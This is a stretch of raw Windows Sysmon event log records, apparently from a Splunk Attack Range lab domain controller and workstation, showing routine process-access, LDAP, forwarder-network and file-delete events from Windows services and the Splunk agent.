12:22:26.021{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291296Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:26.021{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291295Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:26.021{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291294Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:26.021{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291293Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:26.021{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291292Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:26.021{BEA10069-D0C1-6086-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{BEA10069-0202-6088-F329-00000000BB01}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291291Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:26.021{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-0202-6088-F329-00000000BB01}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291290Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:26.022{BEA10069-0202-6088-F329-00000000BB01}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000439946Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:23.236{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local62383-true0:0:0:0:0:0:0:1win-dc-932.attackrange.local389ldap 354300x8000000000000000439945Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:23.236{42DC5269-CEA9-6086-2300-00000000BA01}2704C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local62383-true0:0:0:0:0:0:0:1win-dc-932.attackrange.local389ldap 10341000x8000000000000000439944Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:26.095{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439943Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:26.095{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439942Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:26.018{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D7A77A75D287E3B3F63DA8E622B0D188,SHA256=A831CA338F85DED07FA16B7BC8EF962E6988BCFA606E6F667E66F6C0ADD46024,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291319Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:27.709{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F168789C891C9AD438AD0F6D54975896,SHA256=B9FA86CF3F3D5D0DFD2871D129C9502F40E4B4F2809CF424EA241DFA737D041E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291318Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:25.417{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50603-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291317Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:27.493{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DB24E12DA1AFB1764F4DA4CB4C23E20,SHA256=23753C3EC59509D3025597B9BA089886ECCDD23E3A49A51247F78278C6C292A7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000439951Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:24.538{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62384-false10.0.1.12-8000- 10341000x8000000000000000439950Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:27.096{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439949Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:27.096{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439948Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:27.086{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=063BA8EFB4B3A3FED1867CAE9D347FA4,SHA256=A9A54D52BAA1F5B755F435EB3BF32E17DF7984E6005D41D0B1A3334879C2DB4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291320Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:28.560{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09E626555D493523DAF92661F9024AD5,SHA256=87ABB432C7755ED33C4FE23E6134F9394B0DBC9661BA516F50E22F57A0CA0E14,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439954Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:28.097{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439953Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:28.097{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439952Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:28.064{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=769225E7D34F2AC53D395945AABB4728,SHA256=BF97F4558FF217870806B53E62E13A6851530640930AD659AD32B853FC54A3BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439957Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:29.098{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439956Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:29.098{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439955Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:29.087{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6FCE60257B639AEC39D7DC0B373718E,SHA256=2758CB8345C93479C480583408701190CB3852C941ADEC6FBF0EE6BC7A6E95CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291321Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:29.581{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BCA8ECDD2250EAF1BBCD0C82ABA4B9B,SHA256=BEBA418A4EA55D408E985AE9EE747C78FC4EEDFDF87CC4CA235DEB2C4F806A8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291322Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:30.599{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C05821B845E1567E99DA85EDE00EA4B,SHA256=63F81BA459E3B7A2206E1F0EE4078A81D01973BFE6BE7D87F6879A02C3B66A39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439960Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:30.315{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E74F5B9BDDD3E53DBBE458DDA7922F98,SHA256=EB378B483A342DC64BD6DDC5C31AF73039FED5D14B78260D448C1D07F41115A9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439959Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:30.099{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439958Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:30.099{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291323Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:31.601{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89D41B01205CF365B7A269E80765873A,SHA256=514FAB1C14CC126302FE62E34E9E037EAF71ED79E7222707CBD6B613752107F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439963Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:31.521{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C828EE01581B8AD587EB390DE8045058,SHA256=9628C68381030738982E5DBFCDECE4989463BC9A042B67ADEAB36636562CB882,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439962Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:31.100{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439961Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:31.100{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439968Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:32.543{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EEC86F1CDF2CF6C69C90976EEAD9466,SHA256=5E02763B82C86BBB939239C037EB4454544AFE8D450050C24B9CFCC60BA9CB7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291324Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:32.667{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CC7A167C175200F3529F7AA8FB88516,SHA256=4C182DACFF15B262E1301A3632C59930C7445A1CD7DE14BEB4F9E05672338E0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439967Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:32.243{42DC5269-CF49-6086-E100-00000000BA01}4048NT 